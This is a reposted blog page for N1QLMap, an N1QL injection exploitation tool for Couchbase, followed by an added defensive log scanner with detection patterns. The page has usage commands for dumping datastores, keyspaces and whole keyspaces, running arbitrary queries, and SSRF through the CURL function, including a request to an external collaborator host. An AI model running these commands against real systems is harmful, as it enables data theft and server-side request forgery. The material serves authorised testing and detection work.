N1QLMap - The Tool Exfiltrates Data From Couchbase Database By Exploiting N1QL Injection Vulnerabilities
2020-11-27 05:30:00 Author: www.blogger.com

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1KNienXRIh0/X78pSckzJsI/AAAAAAAAUeo/SrYDmkYOFqg8qBoxgKyNnffzHcEHRPO9gCNcBGAsYHQ/s983/N1QLMap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="655" data-original-width="983" height="426" src="https://1.bp.blogspot.com/-1KNienXRIh0/X78pSckzJsI/AAAAAAAAUeo/SrYDmkYOFqg8qBoxgKyNnffzHcEHRPO9gCNcBGAsYHQ/w640-h426/N1QLMap.png" width="640" /></a></div>
<p><code>N1QLMap</code> is an N1QL exploitation tool. It currently works with Couchbase databases. The tool supports data extraction and SSRF attacks via the N1QL CURL function. More information can be found here: <a href="https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database" rel="nofollow" target="_blank" title="https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database">https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database</a>.</p>
<span style="font-size: x-large;"><b>Usage</b></span><br />
<br />
<span style="font-size: large;"><b>Help</b></span><br />
<pre><code>usage: n1qlMap.py [-h] [-r REQUEST] [-k KEYWORD] [--proxy PROXY] [--validatecerts] [-v]
                  (-d | -ks DATASTORE_URL | -e KEYSPACE_ID | -q QUERY | -c [ENDPOINT [OPTIONS ...]])
                  host

positional arguments:
  host                  Host used to send an HTTP request e.g. https://vulndomain.net

optional arguments:
  -h, --help            show this help message and exit
  -r REQUEST, --request REQUEST
                        Path to an HTTP request
  -k KEYWORD, --keyword KEYWORD
                        Keyword that exists in HTTP response when query is successful
  --proxy PROXY         Proxy server address
  --validatecerts       Set the flag to enforce certificate validation. Certificates are not validated by default!
  -v, --verbose_debug   Set the verbosity level to debug
  -d, --datastores      Lists available datastores
  -ks DATASTORE_URL, --keyspaces DATASTORE_URL
                        Lists available keyspaces for specific datastore URL
  -e KEYSPACE_ID, --extract KEYSPACE_ID
                        Extracts data from a specific keyspace
  -q QUERY, --query QUERY
                        Run arbitrary N1QL query
  -c [ENDPOINT [OPTIONS ...]], --curl [ENDPOINT [OPTIONS ...]]
                        Runs CURL N1QL function inside the query, can be used to SSRF
</code></pre>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<ol>
<li>Put an HTTP request into a <code>request.txt</code> file and mark the injection point with <code>*i*</code>. See the <code>example_request_1.txt</code> file for reference.</li>
<li>Use one of the following commands.</li>
</ol>
<p>Extracts datastores:</p>
<div><pre><code>$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --datastores</code></pre></div>
<p>Extracts keyspaces from the specific datastore ID:</p>
<div><pre><code>$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --keyspaces "http://127.0.0.1:8091"</code></pre></div>
<p>Extracts all documents from the given keyspace:</p>
<div><pre><code>$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --extract travel-sample</code></pre></div>
<p>Run arbitrary query:</p>
<div><pre><code>$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --query 'SELECT * FROM `travel-sample` AS T ORDER by META(T).id LIMIT 1'</code></pre></div>
<p>Perform CURL request / SSRF:</p>
<div><pre><code>$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --curl *************j3mrt7xy3pre.burpcollaborator.net "{'request':'POST','data':'data','header':['User-Agent: Agent Smith']}"</code></pre></div>
<br />
<span style="font-size: x-large;"><b>Demo</b></span><br />
<p>To play with the vulnerability, you can spin up Docker machines with Couchbase and a NodeJS web application. If you already meet the Requirements, just run:</p>
<div><pre><code>cd n1ql-demo
./quick_setup.sh</code></pre></div>
<p>Now you can run the commands described in the <code>Usage</code> section against the Dockerised web application.</p>
<br />
<span style="font-size: x-large;"><b>Requirements</b></span><br />
<p>The <code>N1QLMap.py</code> script has no specific requirements apart from Python 3.</p>
<p>The following requirements apply only to the demo provided in the <code>n1ql-demo</code> directory.</p>
<ul>
<li>Docker</li>
<li>Docker Compose</li>
</ul>
<p>To install Docker and Docker Compose on Kali:</p>
<div><pre><code># Docker Installation
curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' &gt; /etc/apt/sources.list.d/docker.list
apt-get update

apt-get remove docker docker-engine docker.io
apt-get install docker-ce

# Start Docker Service
systemctl start docker

# Docker Compose Installation
sudo curl -L "https://github.com/docker/compose/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose</code></pre></div>
<p>Let's test Docker:</p>
<div><pre><code>docker run hello-world</code></pre></div>
<br /><br />
<div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/FSecureLABS/N1QLMap" rel="nofollow" target="_blank" title="Download N1QLMap">Download N1QLMap</a></span></b></div>
Zion3R
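<p>For defenders, the tool modes listed above (datastore and keyspace listing, paged extraction, the CURL function) leave recognisable strings in request parameters. The following is an added example, not part of N1QLMap or the original post: a small scanner that flags such strings in web access logs. The log format, the sample lines and the indicator patterns are assumptions made for illustration, and only query-string parameters are inspected.</p>

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Assumed indicators, chosen from the tool modes listed on this page; they are
# not taken from N1QLMap's source and will need tuning per application.
INDICATORS = {
    "datastore-enumeration": re.compile(r"system\s*:\s*datastores", re.I),
    "keyspace-enumeration": re.compile(r"system\s*:\s*keyspaces", re.I),
    "curl-function": re.compile(r"\bcurl\s*\(", re.I),
    "meta-id-paging": re.compile(r"\bmeta\s*\(\s*`?[\w-]*`?\s*\)\s*\.\s*id\b", re.I),
}

# Constructed access-log format: <client> "<METHOD> <target> HTTP/x.y" <status>
LINE_RE = re.compile(r'^(\S+) "([A-Z]+) (\S+) HTTP/[\d.]+" (\d{3})$')

def fully_decode(value, max_rounds=3):
    """Strip up to max_rounds extra layers of URL encoding."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return the sorted indicator names found in one log line's query string."""
    match = LINE_RE.match(line.strip())
    if not match:
        return []
    hits = set()
    for _name, raw in parse_qsl(urlsplit(match.group(3)).query, keep_blank_values=True):
        text = fully_decode(raw)  # parse_qsl decoded once; undo any further layers
        hits.update(label for label, rx in INDICATORS.items() if rx.search(text))
    return sorted(hits)

def scan_log(lines):
    """Map 1-based line numbers to their indicators, skipping clean lines."""
    report = {}
    for number, line in enumerate(lines, start=1):
        hits = scan_line(line)
        if hits:
            report[number] = hits
    return report

# Constructed sample lines (fragments only, not captured traffic).
SAMPLE_LOG = [
    '10.0.0.5 "GET /beers?name=curly+wurly HTTP/1.1" 200',
    '10.0.0.9 "GET /beers?name=zz+FROM+system%3Adatastores HTTP/1.1" 200',
    '10.0.0.9 "GET /beers?name=zz%2520curl%2528 HTTP/1.1" 500',
    '10.0.0.9 "GET /beers?name=zz&sort=META(T).id HTTP/1.1" 200',
]
```

<p>Calling <code>scan_log(SAMPLE_LOG)</code> reports lines 2 to 4 and leaves the benign first line alone; the third line is only caught because the value is decoded more than once.</p>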

Source: http://www.blogger.com/feeds/8317222231133660547/posts/default/555258648149562086